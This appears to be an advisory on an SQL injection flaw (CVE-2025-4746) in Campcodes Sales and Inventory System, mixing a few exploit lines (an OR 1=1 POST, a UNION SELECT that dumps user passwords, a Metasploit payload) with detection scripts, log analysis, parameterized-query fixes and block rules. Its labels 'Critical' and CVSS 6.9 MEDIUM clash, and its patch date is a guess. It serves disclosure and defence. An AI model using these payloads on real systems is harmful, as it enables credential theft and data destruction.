Campcodes Sales and Inventory System, SQL Injection, CVE-2025-4746 (Critical)

How CVE-2025-4746 Works

This vulnerability exists in Campcodes Sales and Inventory System 1.0 due to improper input sanitization in the `/pages/purchase_delete.php` file. The `pr_id` parameter is directly concatenated into an SQL query without validation, allowing attackers to inject malicious SQL commands. Remote exploitation is possible by sending crafted HTTP requests containing SQL payloads. Successful exploitation can lead to unauthorized database access, data theft, or system compromise. The vulnerability has a CVSS 4.0 score of 6.9 (MEDIUM) with network-based attack vectors requiring no privileges or user interaction.

DailyCVE Form

Platform: Campcodes S&I
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 06/03/2025

Prediction: Patch by 08/2025

What Undercode Says:

Exploitation Commands:

curl -X POST "http://target/pages/purchase_delete.php" -d "pr_id=1' OR 1=1--"
1' UNION SELECT username,password FROM users--

Detection Script (Python):

import requests

# "target" is a placeholder for the host under test
url = "http://target/pages/purchase_delete.php"
# send pr_id as a form field (a dict), not as a raw string body
payload = {"pr_id": "1'"}
response = requests.post(url, data=payload, timeout=10)
# a leaked MySQL error message shows the unsanitized quote reached the query
if "SQL syntax" in response.text:
    print("Vulnerable to CVE-2025-4746")

Mitigation Steps:

1. Use prepared statements (parameterized queries) so `pr_id` is bound as data, never concatenated into the SQL string:

$stmt = $conn->prepare("DELETE FROM purchases WHERE id = ?");
$pr_id = $_POST['pr_id'];
$stmt->bind_param("i", $pr_id);
$stmt->execute();

2. Deploy WAF rules to block SQLi patterns.

3. Disable error messages in production.

Log Analysis (Post-Exploitation):

grep 'purchase_delete.php' /var/log/apache2/access.log | grep -E "UNION|SELECT|--"
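The grep above only matches literal, unencoded keywords in the request line, and a payload sent in a POST body (as in the curl example) never appears in access.log at all; only query-string payloads do. The following is an added example, not part of the advisory or the Campcodes project: a Python pass over constructed Apache combined-format log lines that URL-decodes the request target (twice, to catch double encoding) before matching the same indicators. The log lines, IPs and timestamps are made up for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [06/Mar/2025:10:01:12 +0000] "GET /pages/purchase_delete.php?pr_id=12 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Mar/2025:10:02:44 +0000] "GET /pages/purchase_delete.php?pr_id=1%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 200 1532 "-" "curl/8.4.0"
203.0.113.9 - - [06/Mar/2025:10:02:50 +0000] "GET /pages/purchase_delete.php?pr_id=1'%20OR%201=1-- HTTP/1.1" 200 210 "-" "curl/8.4.0"
198.51.100.2 - - [06/Mar/2025:10:03:01 +0000] "GET /pages/index.php?q=select%20all HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The indicators from the grep above, plus the tautology and version probe
# quoted elsewhere in this write-up, matched case-insensitively after decoding.
SQLI_RE = re.compile(r"union\s+select|'\s*or\s+1\s*=\s*1|--|@@version", re.IGNORECASE)


def decode_target(target):
    """URL-decode up to twice so %2527 -> %27 -> ' is still caught."""
    prev = target
    for _ in range(2):
        cur = unquote_plus(prev)
        if cur == prev:
            break
        prev = cur
    return prev


def find_sqli_hits(log_text):
    """Return one record per request to purchase_delete.php whose decoded
    target contains an SQL injection indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-combined line, skip
        decoded = decode_target(m.group("target"))
        if "purchase_delete.php" not in decoded:
            continue  # only the vulnerable endpoint is of interest here
        if SQLI_RE.search(decoded):
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "decoded": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in find_sqli_hits(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["decoded"])
```

On the sample input the benign `pr_id=12` request and the unrelated index.php line are ignored, while both encoded payloads from the same client are flagged; a literal grep for `UNION|SELECT` would have missed the `%20UNION%20SELECT` form. To see POST bodies you need request logging at the application or WAF layer, or `mod_security` audit logs, since access.log records only the request line.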

Exploit PoC (Metasploit Module Skeleton):

'Payload' => { 'pr_id' => "' UNION SELECT @@version--" }

Database Hardening:

REVOKE DELETE ON purchases FROM 'app_user'@'%';

Emergency Patch (Temporary Fix):

if (!is_numeric($_POST['pr_id'])) { die("Invalid input"); }
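Why mitigation step 1 and the emergency patch work, shown as an added example that is not part of the advisory or of the Campcodes code: a Python sqlite3 stand-in for the purchases table runs the advisory's own `1' OR 1=1--` payload through a concatenated query, a parameterized query, and a numeric allowlist check. The table layout, sample rows and function names are constructed for the demo; the numeric check is stricter than PHP's `is_numeric()`, which also accepts floats, exponents and leading whitespace.

```python
import re
import sqlite3

# The payload quoted in the advisory's curl example, used here as constructed input.
INJECTED_ID = "1' OR 1=1--"


def make_db():
    """In-memory stand-in for the purchases table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE purchases (id INTEGER PRIMARY KEY, item TEXT)")
    conn.executemany("INSERT INTO purchases (id, item) VALUES (?, ?)",
                     [(1, "paper"), (2, "toner"), (3, "stapler")])
    conn.commit()
    return conn


def delete_purchase_vulnerable(conn, pr_id):
    """Mirrors the flaw: pr_id is concatenated straight into the statement,
    so a quote in the input ends the literal and the rest becomes SQL."""
    conn.execute("DELETE FROM purchases WHERE id = '" + pr_id + "'")
    conn.commit()


def delete_purchase_parameterized(conn, pr_id):
    """Prepared statement: pr_id is bound as a value and cannot alter the query."""
    conn.execute("DELETE FROM purchases WHERE id = ?", (pr_id,))
    conn.commit()


def parse_pr_id(raw):
    """Allowlist check, the equivalent of the is_numeric() emergency patch but
    stricter: only an unsigned decimal integer is accepted."""
    if not isinstance(raw, str) or re.fullmatch(r"[0-9]+", raw) is None:
        raise ValueError("Invalid input")
    return int(raw)


def count_rows(conn):
    return conn.execute("SELECT COUNT(*) FROM purchases").fetchone()[0]


def demo():
    """Run the same payload through each code path and report surviving rows."""
    results = {}

    conn = make_db()
    delete_purchase_vulnerable(conn, INJECTED_ID)
    results["vulnerable"] = count_rows(conn)        # OR 1=1 matched every row

    conn = make_db()
    delete_purchase_parameterized(conn, INJECTED_ID)
    results["parameterized"] = count_rows(conn)     # no id equals that text, 3 remain

    conn = make_db()
    try:
        delete_purchase_parameterized(conn, parse_pr_id(INJECTED_ID))
        results["validated"] = "accepted"
    except ValueError:
        results["validated"] = "rejected"           # never reaches the database

    conn = make_db()
    delete_purchase_parameterized(conn, parse_pr_id("2"))
    results["legitimate"] = count_rows(conn)        # exactly one row deleted

    return results


if __name__ == "__main__":
    print(demo())
```

The concatenated path loses the whole table to a single request; the parameterized path treats the payload as an id that matches nothing; the allowlist check rejects it before any query runs. Use both: the type check stops junk early, and binding protects every query path that the check might miss.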

Network-Based Protection:

iptables -A INPUT -p tcp --dport 80 -m string --string "UNION SELECT" -j DROP

Vulnerability Scanner Query (Nuclei):

id: CVE-2025-4746
info:
  name: Campcodes SQLi
requests:
  - method: POST
    path:
      - "{{BaseURL}}/pages/purchase_delete.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "pr_id=1'"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
